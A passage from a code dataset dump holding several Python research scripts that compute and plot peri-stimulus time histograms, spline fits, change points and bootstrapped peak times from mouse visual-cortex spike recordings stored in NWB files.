ncols=2, figsize=(10, 10))\nfig.tight_layout(pad=0.1, w_pad=0.1, h_pad=0.1)\nfig.suptitle(\"Mouse %s Neural Activity\" % (MOUSE_ID))\nfig.text(0.5, 0.04, 'Bins (ms)', ha='center')\nfig.text(0.04, 0.5, 'Firing Rate (Spike/sec)', va='center', rotation='vertical')\ni = 0\n\nfor row in range(0, rows):\n for col in range(0, cols):\n\n probe_name = probe_names[i]\n probe_filename = MOUSE_ID + \"_\" + probe_name\n \n with open(probe_filename, 'rb') as f:\n probe = pickle.load(f)\n\n box = axes[row,col].get_position()\n move = 0.08\n move2 = 0.033\n move3 = 0.053\n\n if(row == 0):\n if(col == 0):\n axes[row,col].set_position([move+box.x0+box.x0/5, box.y0, box.width * 0.8 , box.height * 0.8])\n else:\n axes[row,col].set_position([move+box.x0-box.x0/7, box.y0, box.width * 0.8 , box.height * 0.8])\n elif(row == 1):\n if(col == 0):\n axes[row,col].set_position([move+box.x0+box.x0/5, box.y0+move2, box.width * 0.8 , box.height * 0.8])\n else:\n axes[row,col].set_position([move+box.x0-box.x0/7, box.y0+move2, box.width * 0.8 , box.height * 0.8])\n elif(row == 2):\n if(col == 0):\n axes[row,col].set_position([move+box.x0+box.x0/5, box.y0+move3, box.width * 0.8 , box.height * 0.8])\n else:\n axes[row,col].set_position([move+box.x0-box.x0/7, box.y0+move3, box.width * 0.8 , box.height * 0.8])\n\n \n axes[row, col].set_ylim([0, 13])\n axes[row, col].set_xlim([-20, 500])\n \n axes[row, col].set_title(probe.name)\n \n axes[row, col].plot(xs, top[probe_name](xs), label = \"75th Percentile\")\n \n axes[row, col].plot(xs, mid[probe_name](xs), label = \"Median Neuron\")\n \n axes[row, col].plot(xs, bot[probe_name](xs), label = \"25th Percentile\")\n\n if(row == 0 and col == cols - 1):\n axes[row, col].legend()\n \n # Next probe\n i = i+1\n\nplt.savefig(PERC_PLOTS_DIRECTORY + str(MOUSE_ID) + \"_percentile.png\")\nplt.clf()\n\n" }, { "alpha_fraction": 0.4861716032028198, "alphanum_fraction": 0.5046820640563965, "avg_line_length": 38.92173767089844, "blob_id": 
"5ce630fc1aa120311ee05a5f48a4b5e9c33ddeb5", "content_id": "80de255be0c7f9abb4f8aea7e4e1109f13458fc1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9184, "license_type": "no_license", "max_line_length": 138, "num_lines": 230, "path": "/nwb_plots.py", "repo_name": "bjmedina/PSTH", "src_encoding": "UTF-8", "text": "\n\"\"\"\nCreated on Wed Jun 12 09:25:21 EDT 2019\n\n@author: Bryan Medina\n\"\"\"\nfrom nwb_plots_functions import *\n# READ ME ################################\n# This file plots\n# - (1) PSTHs for every cell (averaged across all trials) as well as a smoothed curve\n# - (2) PSTHs for every probe (averaged across all trials and all cells) as well as a smoothed curve\n# - (3) Smoothed curve for every probe\n##########################################\n\n## CHANGE ME #############################################################\n# Data directory\nDIRECTORY = '/home/bjm/Documents/CS/PSTH'\nSUMMARY_PLOTS_DIRECTORY = '/home/bjm/Documents/CS/PSTH/plots/'\nVAR_DIREC = '/home/bjm/Documents/CS/PSTH/plots/variations/'\nMOUSE_ID = '421338'\n##########################################################################\n\n\n# Get file from directory\nspikes_nwb_file = os.path.join(DIRECTORY, 'mouse' + MOUSE_ID + '.spikes.nwb')\nnwb = h5.File(spikes_nwb_file, 'r')\n\nprobe_names = nwb['processing']\n\n# Allows plotting (takes more time)\nPLOTTING = True\n\n# Print Descriptions\nDESCRIPTIONS = True\n\n# Turn this on if it's your first time running this code.\nALL_PLOTS = True\n\nif(ALL_PLOTS):\n for probe_name in probe_names:\n # File to get data from.\n probe_filename = MOUSE_ID + \"_\" + probe_name\n print(probe_filename)\n \n # plot directories\n \n ## CHANGE ME ####################################################################################\n PROBE_PLOTS_DIRECTORY = '/home/bjm/Documents/CS/PSTH/plots/probes/'\n CELL_PLOTS_DIRECTORY = '/home/bjm/Documents/CS/PSTH/plots/cells/' + probe_name + '/'\n 
#################################################################################################\n \n ## Find probe to override\n try:\n with open(probe_filename, 'rb') as f:\n probe = pickle.load(f)\n ## If probe file doesn't exist, then we'll have to make that file from scratch \n except FileNotFoundError:\n \n for probe_name in probe_names:\n saveProbeData(MOUSE_ID, probe_name, nwb)\n \n print(\"Run again\")\n sys.exit(1)\n \n # Summary of all activity across all cells in a probe.\n x = np.zeros((len(bins), 1))\n\n # Plotting (1) #####################\n # Getting all data for a given cell\n for cell in probe.getCellList():\n # current cell spiking data\n curr_cell = np.zeros((len(bins), 1))\n for freq in temp_freqs:\n for angle in orientations:\n config = str(freq) + \"_\" + str(angle)\n curr_cell += probe.getCell(cell).getSpikes(config)\n # Plot curr cell\n x += probe.getCell(cell).getSpikes(config)\n \n # Convert cell spiking data to a format 'plt.hist' will like\n z = fromFreqList(curr_cell)\n curr_cell,b,c = plt.hist(z, bins)\n plt.clf()\n \n # Normalize\n curr_cell /= num_trials*0.001\n \n # Get some information on the cell such as max firing rate, avg, std, and name\n ################# Finding peaks and valleys #######################\n probe.getCell(cell).max_frate = max(curr_cell[0:500])\n probe.getCell(cell).max_ftime = np.where(curr_cell[0:500] == probe.getCell(cell).max_frate)[0][0]\n probe.getCell(cell).avg_frate = np.mean(curr_cell[0:500])\n probe.getCell(cell).std = np.std(curr_cell[0:500])\n probe.getCell(cell).name = cell\n \n # Also get the associated firing rate curve for the cell\n lsq = LSQUnivariateSpline(bins[0:len(bins)-1], curr_cell, knots)\n probe.getCell(cell).lsq = lsq\n\n cpm_result = cpm.detectChangePoint(FloatVector(lsq(curr_cell[0:probe.getCell(cell).max_ftime])), cpmType='Student', ARL0=1000)\n cpm_result = robj_to_dict(cpm_result)\n \n probe.getCell(cell).change_pt = lsq(cpm_result['changePoint'][0])\n 
probe.getCell(cell).chg_time = cpm_result['changePoint'][0]\n ####################################################################\n \n if(DESCRIPTIONS):\n print(\"Cell \" + str(cell) + \" : \" + str(probe.getCell(cell))) \n \n # Plotting\n if(PLOTTING):\n # Plotting normalized cell activity\n cell_filename = MOUSE_ID + \"_cell\" + str(cell)\n plt.axvline(x=probe.getCell(cell).chg_time, alpha=0.5, linestyle='--', color='magenta')\n plt.ylim(0, 75)\n plt.xlim(-20, 520)\n plt.ylabel('Spikes/second')\n plt.xlabel('Bins')\n plt.title(\"Mouse: \" + str(MOUSE_ID) + \" / \" + probe_name + \" in \"+ probe.name + \". Cell: \" + str(cell))\n plt.plot(xs, lsq(xs), color = 'magenta', alpha=0.9) \n plt.bar(b[0:len(b)-1], curr_cell)\n plt.savefig(CELL_PLOTS_DIRECTORY + cell_filename + \".png\")\n plt.clf() \n # End Plotting (1) ####################\n \n # Plotting normalized probe activity\n z = fromFreqList(x)\n x,b,c = plt.hist(z, bins)\n plt.clf()\n ###\n \n ### Normalization\n # also divide by number of neurons in that particular region\n x /= num_trials*(0.001)*len(probe.getCellList())\n \n # Need to find the two maxes and two mins\n\n ################# Finding peaks and valleys #######################\n # First we find the first peak and the time it occurs at.\n probe.max_frate = max(x[0:500]) \n probe.max_ftime = np.where(x[0:500] == probe.max_frate)[0][0]\n \n # Now first valley\n probe.min_frate = min(x[0:probe.max_ftime]) \n probe.min_ftime = np.where(x[0:probe.max_ftime] == probe.min_frate)[0][0] \n \n # Now second peak\n probe.max_frate2 = max(x[200:300]) \n probe.max_ftime2 = np.where(x[200:300] == probe.max_frate2)[0][0] + 200\n \n # Last valley\n probe.min_frate2 = min(x[probe.max_ftime:probe.max_ftime2])\n probe.min_ftime2 = np.where(x[probe.max_ftime:probe.max_ftime2] == probe.min_frate2)[0][0] + probe.max_ftime\n \n # The value it converges towards the end.\n probe.converge = min(x[probe.max_ftime2:500])\n \n # Average firing rate + standard deviation\n 
probe.avg_frate = np.mean(x[0:500])\n probe.std = np.std(x[0:500])\n\n # Smoothed Function\n lsq = LSQUnivariateSpline(bins[0:len(bins)-1], x, knots)\n probe.lsq = lsq\n \n # Get the change point here \n cpm_result = cpm.detectChangePoint(FloatVector(lsq(xs[probe.min_ftime-5:probe.max_ftime+1])), cpmType='Student', ARL0=1000)\n cpm_result = robj_to_dict(cpm_result)\n \n # Set chnage point and change point time\n probe.change_pt = lsq(cpm_result['changePoint'][0]+probe.min_ftime-5)\n probe.chg_time = cpm_result['changePoint'][0]+probe.min_ftime-5\n ###################################################################\n \n \n if(DESCRIPTIONS):\n print(repr(probe))\n \n # Plotting (2) ###############################################\n if(PLOTTING):\n # Plotting\n plt.axvline(x=probe.chg_time, color='red', linestyle='--', alpha=0.7)\n plt.ylim(0, 12)\n plt.xlim(-20, 500)\n plt.ylabel('Spikes/second')\n plt.xlabel('Bins')\n plt.title(\"Mouse: \" + str(MOUSE_ID) + \" / \" + probe_name + \" in \"+ probe.name)\n plt.plot(xs, lsq(xs), color = 'red') \n plt.bar(b[0:len(b)-1], x, alpha=0.8)\n plt.savefig(PROBE_PLOTS_DIRECTORY + probe_filename + \".png\")\n \n plt.clf()\n \n with open(probe_filename, 'wb') as f:\n pickle.dump(probe, f)\n # End Plotting (2) ###########################################\n\n \n\n# Plotting (3) ###############################################\n# Here, we'll plot all curves for every region for a given mouse.\nprobes = []\n\n# First, lets order the probe in terms of the time in which the max firing rate occurs\nfor probe_name in probe_names:\n \n probe_filename = MOUSE_ID + \"_\" + probe_name\n\n with open(probe_filename, 'rb') as f:\n # Plotting all curves for every region for a given mouse.\n probe = pickle.load(f)\n\n probes.append(probe)\n\nprobes.sort(key=lambda x: x.max_ftime)\n\n# Finally, we can plot\nfor i in range(0, len(probes)):\n\n probe = probes[i]\n plt.ylabel('Firing Rate (Spikes/second)')\n plt.xlabel('Bins (ms)')\n plt.ylim(0, 12)\n 
plt.xlim(-20, 500)\n plt.title(\"Mouse: \" + str(MOUSE_ID) + \" | Average Firing Rates\")\n plt.plot(xs, probe.lsq(xs), label = probe.name, color=colors[i])\n\nplt.legend()\nplt.savefig(SUMMARY_PLOTS_DIRECTORY + str(MOUSE_ID) + \".png\")\nplt.clf()\n# End Plotting (3) ###########################################\n\n" }, { "alpha_fraction": 0.5907312631607056, "alphanum_fraction": 0.6120975017547607, "avg_line_length": 25.165353775024414, "blob_id": "6d88e6eadf71ac1a30c2ff8a7a360a08488ab9b2", "content_id": "7da0cafdabcde93e35e656ac832e4b3e6eba5bdf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3323, "license_type": "no_license", "max_line_length": 77, "num_lines": 127, "path": "/nwb_plots_percentile.py~", "repo_name": "bjmedina/PSTH", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jul 1 11:50:02 EDT 2019\n\n@author: Bryan Medina\n\"\"\"\n###### Imports ########\nfrom nwb_plots_functions import *\nfrom scipy.interpolate import LSQUnivariateSpline\n\nimport h5py as h5\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport pickle\nimport sys\n########################\n\n###### UPDATE PATH #################################\nDIRECTORY = '/Users/bjm/Documents/CMU/Research/data'\nVAR_DIREC = '/Users/bjm/Documents/CMU/Research/data/plots/variations/'\nSUMMARY_PLOTS_DIRECTORY = '/Users/bjm/Documents/CMU/Research/data/plots/'\nMOUSE_ID = '405751'\n####################################################\n\n# Get file from directory\nspikes_nwb_file = os.path.join(DIRECTORY, 'mouse' + MOUSE_ID + '.spikes.nwb')\nnwb = h5.File(spikes_nwb_file, 'r')\n\nprobe_names = nwb['processing']\n\n# save all curves for all regions\nmid = {}\ntop = {}\nbot = {}\n\nfor probe_name in probe_names:\n # Calculate median neuron, and also 90th and 10th percentile neuron\n median_n = []\n top_ten = []\n bot_ten = []\n \n probe_filename = MOUSE_ID + \"_\" + 
probe_name\n\n with open(probe_filename, 'rb') as f:\n probe = pickle.load(f)\n \n for xval in xs:\n \n rates = []\n \n for cell in probe.getCellList():\n rates.append(probe.getCell(cell).lsq(xval))\n\n # Sort this list...\n rates.sort()\n \n median_n.append(np.median(rates))\n top_ten.append(np.percentile(rates, 85))\n bot_ten.append(np.percentile(rates, 15))\n \n # save the curves\n mid[probe_name] = LSQUnivariateSpline(xs, median_n, knots[1:-1])\n top[probe_name] = LSQUnivariateSpline(xs, top_ten, knots[1:-1])\n bot[probe_name] = LSQUnivariateSpline(xs, bot_ten, knots)\n\n\n# Plotting median, 85th percentile, and 15th percentile neuron\n\n# Median\nfor probe_name in probe_names:\n \n probe_filename = MOUSE_ID + \"_\" + probe_name\n\n with open(probe_filename, 'rb') as f:\n probe = pickle.load(f)\n \n plt.ylim(0, 5)\n plt.xlim(-20, 500)\n plt.title(\"Median Neuron Activity for Mouse \" + str(MOUSE_ID))\n plt.ylabel('Spikes/second')\n plt.xlabel('Bins')\n plt.plot(xs, mid[probe_name](xs), label=probe.name)\n\nplt.legend()\nplt.savefig(SUMMARY_PLOTS_DIRECTORY + str(MOUSE_ID) + \"_MEDIAN.png\")\nplt.clf()\n\n# 85th\nfor probe_name in probe_names:\n \n probe_filename = MOUSE_ID + \"_\" + probe_name\n\n with open(probe_filename, 'rb') as f:\n probe = pickle.load(f)\n \n plt.ylim(0, 20)\n plt.xlim(-20, 500)\n plt.title(\"85th Percentile Neuron Activity for Mouse \" + str(MOUSE_ID))\n plt.ylabel('Spikes/second')\n plt.xlabel('Bins')\n plt.plot(xs, top[probe_name](xs), label=probe.name)\n\nplt.legend()\nplt.savefig(SUMMARY_PLOTS_DIRECTORY + str(MOUSE_ID) + \"_85TH.png\")\nplt.clf()\n\n\n# 15th\nfor probe_name in probe_names:\n \n probe_filename = MOUSE_ID + \"_\" + probe_name\n\n with open(probe_filename, 'rb') as f:\n probe = pickle.load(f)\n \n plt.ylim(0, 1)\n plt.xlim(-2, 500)\n plt.title(\"15th Percentile Neuron Activity for Mouse \" + str(MOUSE_ID))\n plt.ylabel('Spikes/second')\n plt.xlabel('Bins')\n plt.plot(xs, bot[probe_name](xs), 
label=probe.name)\n\nplt.legend()\nplt.savefig(SUMMARY_PLOTS_DIRECTORY + str(MOUSE_ID) + \"_15TH.png\")\nplt.clf()\n" }, { "alpha_fraction": 0.4629461467266083, "alphanum_fraction": 0.4828033745288849, "avg_line_length": 35.00467300415039, "blob_id": "f4687a441ea74c420c5249dc45163213cf7230b9", "content_id": "173ca3ac655494b3ec846ef78077caf0e67c6144", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7705, "license_type": "no_license", "max_line_length": 119, "num_lines": 214, "path": "/nwb_trials.py", "repo_name": "bjmedina/PSTH", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 12 09:25:21 EDT 2019\n\n@author: Bryan Medina\n\"\"\"\nfrom nwb_plots_functions import *\n# READ ME ################################\n'''\nThis file\n- Gets the different values for t1, t2, ..., t5, beta1, beta2, ..., beta5 for each trial\n- Compares then all against each other.\n'''\n##########################################\n\n## CHANGE ME #############################################################\n# Data directory\nDIRECTORY = '/Users/bjm/Documents/CMU/Research/data/'\nTRIAL_DATA = '/Users/bjm/Documents/CMU/Research/data/trial_data/'\nTRIAL_PLOTS = '/Users/bjm/Documents/CMU/Research/data/plots/trials/'\nTMAX_DIREC = '/Users/bjm/Documents/CMU/Research/data/tmax/'\nMOUSE_ID = '421338'\n##########################################################################\n\n\n# Get file from directory\nspikes_nwb_file = os.path.join(DIRECTORY, 'mouse' + MOUSE_ID + '.spikes.nwb')\nnwb = h5.File(spikes_nwb_file, 'r')\n\nprobe_names = nwb['processing']\n\n# Whether or not we want to calculate the confidence intervals\nCONF_INTERVAL = True\nBOOTSTRAPS = 500\n\ntrials = []\nt_max1 = []\nt_max2 = []\n\n# Changes depending on the trial.\nstart = 0 #in second\nend = 2000 #in seconds\n\n# time stamps ( this never changes )\n# This is SPECIFICALLY for the 'drifting_gratings_2' 
stimulus\ntimestamps = nwb['stimulus']['presentation']['drifting_gratings_2']['timestamps'].value\nstim_orient = nwb['stimulus']['presentation']['drifting_gratings_2']['data'].value\n\nPLOTTING = False\n## For every region,\nfor probe_name in probe_names:\n\n print(probe_name)\n # File to get data from\n probe_filename = DIRECTORY + MOUSE_ID + \"_\" + probe_name\n\n try:\n with open(probe_filename, 'rb') as f:\n probe = pickle.load(f)\n\n except FileNotFoundError:\n\n for probe_name in probe_names:\n saveProbeData(MOUSE_ID, probe_name, nwb)\n\n ## For EVERY trial,\n for trial_number in range(len(timestamps)):\n print(\"Trial number %d\" % trial_number)\n # Check if we have this file\n\n try: \n trial_file = TRIAL_DATA + \"/\" + MOUSE_ID + \"/\" + probe_name + \"/tr_\" + str(trial_number)\n with open(trial_file, 'rb') as t:\n tr = pickle.load(t)\n trials.append(tr)\n\n except FileNotFoundError:\n trial = timestamps[trial_number]\n freq = stim_orient[trial_number][1]\n angle = stim_orient[trial_number][3]\n\n # Checking for 'nans'\n if not (str(freq) == \"nan\") or not (str(angle) == \"nan\"):\n freq = int(freq)\n angle = int(angle)\n \n config = str(freq) + \"_\" + str(angle)\n \n ## go through every cell in that region,\n ## find out how that cell is behaving IN THE TRIAL'S TIME FRAME,\n ## and save that activity to a vector...\n \n ## do that for every trial... 
essentially make PSTHs for every trial...\n curr_trial = np.zeros((len(bins), 1))\n \n for cell in probe.getCellList():\n spikes = nwb['processing'][probe_name]['UnitTimes'][str(cell)]['times'].value\n stimulus_spikes = binarySearch(spikes, trial, 0, len(spikes)-1)\n \n if not (type(stimulus_spikes) == type(-1)):\n stimulus_spikes = (stimulus_spikes - trial[0])\n stimulus_spikes *= 1000\n \n for stim_spike in stimulus_spikes:\n curr_trial[insertToBin(stim_spike, end)] += 1\n\n ########################\n tr = Trial()\n tr.number = trial_number\n tr.config = config\n tr.spikes = curr_trial\n # tr.t\n # tr.beta\n\n z = fromFreqList(curr_trial)\n curr_trial,b,c = plt.hist(z, bins)\n plt.clf()\n\n curr_trial /= 0.001*len(probe.getCellList())\n\n tr.spikes = curr_trial\n tr.lsq = LSQUnivariateSpline(bins[0:len(bins)-1], curr_trial, knots)\n #tr.lsq = UnivariateSpline(bins[0:len(bins)-1], curr_trial)\n\n trials.append(tr)\n #######################\n with open(trial_file, 'wb') as t:\n pickle.dump(tr, t)\n\n if(PLOTTING):\n plt.xlim(-2, 500)\n plt.ylim(0, 50)\n plt.ylabel('Spikes/second')\n plt.xlabel('Bins')\n plt.title(\"Mouse: \" + str(MOUSE_ID) + \" | \" + probe_name + \" trial: \" + str(tr.number) + \" | \" + tr.config)\n plt.bar(bins[0:len(bins)-1], tr.spikes, alpha=0.8, color='blue')\n plt.plot(xs, tr.lsq(xs), color='red', alpha=0.4)\n plt.show()\n #plt.savefig(TRIAL_PLOTS + MOUSE_ID + \"/\" + probe_name + \"/\" + \"tr_\"+str(trial_number))\n plt.clf()\n \n\n\n if(CONF_INTERVAL):\n # Calculating the confidence intervals\n fname = TMAX_DIREC + MOUSE_ID + \"/\" + probe_name + \"/\" + MOUSE_ID + \"_tmax_\"\n\n try:\n with open(fname + \"1\", 'rb') as f:\n t_max1 = pickle.load(f)\n\n with open(fname + \"2\", 'rb') as f:\n t_max2 = pickle.load(f)\n\n except FileNotFoundError:\n # We're doing 500 bootstraps\n for i in range(0, BOOTSTRAPS):\n print(\"BOOTSTRAP %d\" % i)\n # g is going to be our random sample, size 600, of the 600 trials\n g = choices(trials, k = 
len(trials))\n \n sample_spikes = np.zeros((len(g[0].spikes),))\n lsq = np.zeros((len(g[0].lsq(xs)), 1))\n \n # Now we need to construct our curves based on these 600 samples\n for sample in g:\n # Need to add all spikes together\n ## To do this, we have to *essentially* do an element wise addition\n for j in range(0, len(sample.spikes)):\n sample_spikes[j] += sample.spikes[j]\n\n # Recompute tmax_1 and tmax_2\n ## We have to normalize sample_spikes by number of trials\n sample_spikes /= len(g)\n peak = max(sample_spikes[0:500])\n tmax_1 = np.where(sample_spikes[0:500] == peak)[0][0]\n \n peak2 = max(sample_spikes[200:300])\n tmax_2 = np.where(sample_spikes[200:300] == peak2)[0][0] + 200\n \n if(PLOTTING):\n print(\"Peak 1: %d @ %d\" % (peak, tmax_1))\n print(\"Peak 2: %d @ %d\" % (peak, tmax_2))\n plt.ylim(0, 10)\n plt.xlim(-2, 500)\n plt.bar(bins[:-1], sample_spikes, alpha=0.8, color='blue')\n plt.axvline(x=tmax_1,color='red', linestyle='--')\n plt.axvline(x=tmax_2,color='red', linestyle='--')\n \n plt.show()\n plt.clf()\n \n # Save those two into two separate vectors\n t_max1.append(tmax_1)\n t_max2.append(tmax_2)\n \n\n \n # clear the slate for the next probe \n trials = []\n \n with open(fname + \"1\", 'wb') as f:\n pickle.dump(t_max1, f)\n\n \n with open(fname + \"2\", 'wb') as f:\n pickle.dump(t_max2, f)\n\n t_max1 = []\n t_max2 = []\n\n \nfname = TMAX_DIREC + MOUSE_ID + \"/\" + probe_name + \"/\" + MOUSE_ID + \"_tmax_\"\n" }, { "alpha_fraction": 0.5249219536781311, "alphanum_fraction": 0.5413135886192322, "avg_line_length": 26.258358001708984, "blob_id": "2f63b48769300fc5480243ebcec90eacb9591c10", "content_id": "ccf2cdf8756aca2f3b6f0877468a392590bdc265", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 17936, "license_type": "no_license", "max_line_length": 377, "num_lines": 658, "path": "/nwb_plots_functions.py", "repo_name": "bjmedina/PSTH", "src_encoding": "UTF-8", "text": "#!/usr/bin/env 
python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 12 09:25:21 EDT 2019\n\n@author: Bryan Medina \n\"\"\"\n###### Imports ########\nfrom random import choices\nfrom rpy2.robjects.vectors import StrVector\nfrom rpy2.robjects.vectors import FloatVector\nfrom scipy.interpolate import LSQUnivariateSpline\nfrom scipy.interpolate import CubicSpline\nfrom scipy.interpolate import UnivariateSpline\n\nimport h5py as h5\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport pickle\nimport rpy2.robjects as robjects\nimport rpy2.robjects.packages as rpackages\nimport sys\n########################\n\n# Setting up packages for rpy2 use\npackage_name = 'cpm'\n\nif rpackages.isinstalled(package_name):\n have_package = True\n print(\"R package %s already installed\" % package_name)\nelse:\n have_pakcage = False\n\nif not have_package:\n utils = rpackages.importr('utils')\n utils.chooseCRANmirror(ind=1)\n\n utils.install_packages(package_name)\n print(\"installed R package: %s\" % package_name)\n\ncpm = rpackages.importr(package_name)\n##################################\n\n### This is for the 'drifting gratings' stimulus\n# All possible temporal frequencies for the stimulus\ntemp_freqs = [1, 2, 4, 8, 15]\n\n# All possible orientations of stimulus (angles)\norientations = [i*45 for i in range(8)]\n\n# Knots for spline (selected by eye)\nknots = [30, 50, 52, 55, 65, 70, 75, 80, 83, 100, 150, 200, 250, 300, 325, 375, 400]\ntr_knots = [50, 110, 160, 200, 250, 300, 350, 400, 450]\n\n# Number of times timulus is presented\nnum_trials = 600\n\n# Conversion frmo ms to s\nmsToSec = 1000 # 1000 ms in 1 sec\n\n# For future plotting\nxs = np.linspace(0,600,3000)\n\n# Start and end of trials\nstart = 0\nend = 2000\n\n# Bin width\nwidth = 1\n\n# Actual bins (for later use)\nbins = np.linspace(start, end, int( (end - start)/width + 1 ))\n\n# Probe to region mapping\nmapping = {'probeA': 'AM',\n 'probeB': 'PM',\n 'probeC': 'V1',\n 'probeD': 'LM',\n 'probeE': 'AL',\n 
'probeF': 'RL'}\n\ncolors = ['k', '#9400D3', 'b', 'g', '#FF7F00', 'r']\n\n###\n\nclass Probe:\n\n # Max firing rate and the time it occurs\n max_frate = 0\n max_ftime = 0\n\n # Second highest firing rate\n max_frate2 = 0\n max_ftime2 = 0\n\n # Min firing rate and the time it occurs\n min_frate = 0\n min_ftime = 0\n\n # Second lowest \n min_frate2 = 0\n min_ftime2 = 0\n\n # Average firing rate that is converged to as t -> 500 ms \n converge = 0\n\n # Change point (before the first peak)\n change_pt = 0\n chg_time = 0 \n\n # Average firing rate\n avg_frate = 0\n\n # Standard deviation of the firing rates\n std = 0\n\n # LSQUnivariate function \n lsq = \" \"\n \n def __init__(self, nwb, name):\n '''\n Description\n -----------\n Constructor\n \n Input(s)\n --------\n 'nwb': h5py._hl.files.File. 'spikes.nwb' dataset. \n 'probe': string. name of probe.\n \n Output(s)\n ---------\n New 'Probe' object\n '''\n \n self.__cells = getProbeCells(nwb, name)\n self.name = mapping[name]\n \n def getCell(self, cell_number):\n '''\n Description\n -----------\n Method returns dictionary of cell \"at index 'cell_number'\"\n \n Input(s)\n --------\n 'cell_number': int. key of a corresponding cells\n \n Output(s)\n ---------\n Dictionary of cell 'cell_number'\n '''\n \n return self.__cells[cell_number]\n\n def getCellList(self):\n '''\n Description\n -----------\n Method returns dictionary of cells\n \n Output(s)\n ---------\n Dictionary of cell 'cell_number'\n '''\n\n return self.__cells.keys()\n\n def __repr__(self):\n '''\n Description\n -----------\n Method replaces default '__str__' with one that prints out average spiking rate, 2 maximum and 2 minimum firing rates, and the time in which they occur. 
\n\n Output(s)\n ---------\n String to print.\n '''\n\n return \"%s\\t Avg: %3.2f Std: %3.2f | Max: %3.2f @ %d | Max2: %3.2f @ %d | Min: %3.2f @ %d | Min2: %3.2f @ %d | Converges to %3.2f | Change: %3.2f @ %d\" % (self.name, self.avg_frate, self.std, self.max_frate, self.max_ftime, self.max_frate2, self.max_ftime2, self.min_frate, self.min_ftime, self.min_frate2, self.min_ftime2, self.converge, self.change_pt, self.chg_time)\n\n def __str__(self):\n '''\n Description\n -----------\n Method replaces default '__repr__' with one that's great for LaTeX-table making.\n\n Output(s)\n ---------\n String to print.\n '''\n\n return \"%s & %3.2f & %3.2f & (%3.2f, %d) & (%3.2f, %d) & (%3.2f, %d) & (%3.2f, %d) & %3.2f & (%3.2f, %d)\\\\\\\\\" % (self.name, self.avg_frate, self.std, self.max_frate, self.max_ftime, self.max_frate2, self.max_ftime2, self.min_frate, self.min_ftime, self.min_frate2, self.min_ftime2, self.converge, self.change_pt, self.chg_time)\n\ndef getProbeCells(nwb, probe):\n '''\n Description\n -----------\n 'GetProbeCells' gets dataset and returns all cells, for a given probe, that are in the Visual Cortex.\n \n Input(s)\n --------\n 'nwb': h5py._hl.files.File. 'spikes.nwb' dataset. \n 'probe': string. name of probe.\n \n Output(s)\n ---------\n 'v_cells': dict. 
Dictionary that all cells that are in V.\n '''\n \n # Get all cells with activity in V\n cells = nwb['processing'][probe]['unit_list'].value\n v_cells = {} \n \n for cell in cells:\n region = nwb['processing'][probe]['UnitTimes'][str(cell)]['ccf_structure'].value.decode('utf-8')\n \n if region[0] == 'V' or region[0] == 'v':\n v_cells[cell] = Cell()\n \n return v_cells\n\n\nclass Cell:\n\n max_frate = 0\n max_ftime = 0\n avg_frate = 0\n std = 0\n name = \" \" \n lsq = \" \"\n # Change point (before the first peak)\n change_pt = 0\n chg_time = 0 \n \n def __init__(self):\n '''\n Description\n -----------\n Constructor\n \n Output(s)\n ---------\n New 'Cell' object\n '''\n self.__table = makeTable()\n\n def getSpikes(self, config):\n '''\n Description\n -----------\n Method returns table for given cell\n \n Input(s)\n --------\n 'config': string. key of dictionary.\n \n Output(s)\n ---------\n table at certain config\n '''\n return self.__table[config]\n\n def addSpike(self, config, spike, end):\n '''\n Description\n -----------\n Method adds 1 to spike counts\n \n Input(s)\n --------\n 'config': string. key of dictionary.\n 'spike' : time of spike in seconds\n 'end' : end of trial \n \n Output(s)\n ---------\n table at certain config\n '''\n # Find out index spike needs to be in.\n bn = insertToBin(spike, end)\n \n # Add one to ongoing count.\n self.__table[config][bn] += 1\n\n def __str__(self):\n '''\n Description\n -----------\n Method replaces default '__str__' with one that prints out average spiking rate, 2 maximum and 2 minimum firing rates, and the time in which they occur. \n\n Output(s)\n ---------\n String to print.\n '''\n return \"Max: %3.2f\\t Avg: %3.2f\\t Std: %3.2f\" % (self.max_frate, self.avg_frate, self.std)\n\nclass Trial:\n # The trial number\n number = -1\n\n # The configuration\n config = \"\"\n\n # Should be five values for each of these\n t = [None]*5\n beta = [None]*5\n\n # Need to make this go from start to end ... 
This will hold the PSTH.\n spikes = np.zeros((len(bins), 1))\n\n lsq = []\n\n def __add__(self, other_trial):\n '''\n Description\n -----------\n Method overrides '+' operator so that you can add two Trial objects\n\n Input(s)\n --------\n 'other_trial': Trial. Another trial object\n \n Output(s)\n ---------\n sum of two trials (adds spiking histogram)\n '''\n pass\n \n\ndef makeTable():\n '''\n Description\n -----------\n 'makeTable' creates a dictionary to keep track of time bins for each possible orientation of stimulus. One for each cell.\n \n Output(s)\n ---------\n 'table': dict. Dictionary that contains orientation combination as key and all cells that are in V.\n '''\n\n bins = np.linspace(start, end, int( (end - start)/width + 1 )) \n \n # In this table, each key is a different configuration of the stimulus\n # and each row corresponds to spikes in a time bin.\n table = {}\n\n for freq in temp_freqs:\n \n for angle in orientations:\n\n config = str(freq) + \"_\" + str(angle) \n table[config] = np.zeros((len(bins), 1))\n\n \n return table\n\ndef binarySearch(spikes, interval, start, end):\n '''\n Description\n -----------\n 'binarySearch' will find the index of a spike in a certain interval. Once it finds the index of a spike in the interval, it will try to find all the spikes that are in that interval. Essentially a modified take on the classic binary search algorithm.\n \n Input(s)\n --------\n 'spikes' : list. list of all spikes of a given neuron.\n 'interval': list. current time interval of stimulus (usually about 2 seconds).\n 'start' : int. beginning\n 'end' : int. end\n\n\n Output(s)\n ---------\n list. Returns list of spikes in a given interval (first spike is found using binary search, the rest with the 'spikesInInterval' method. 
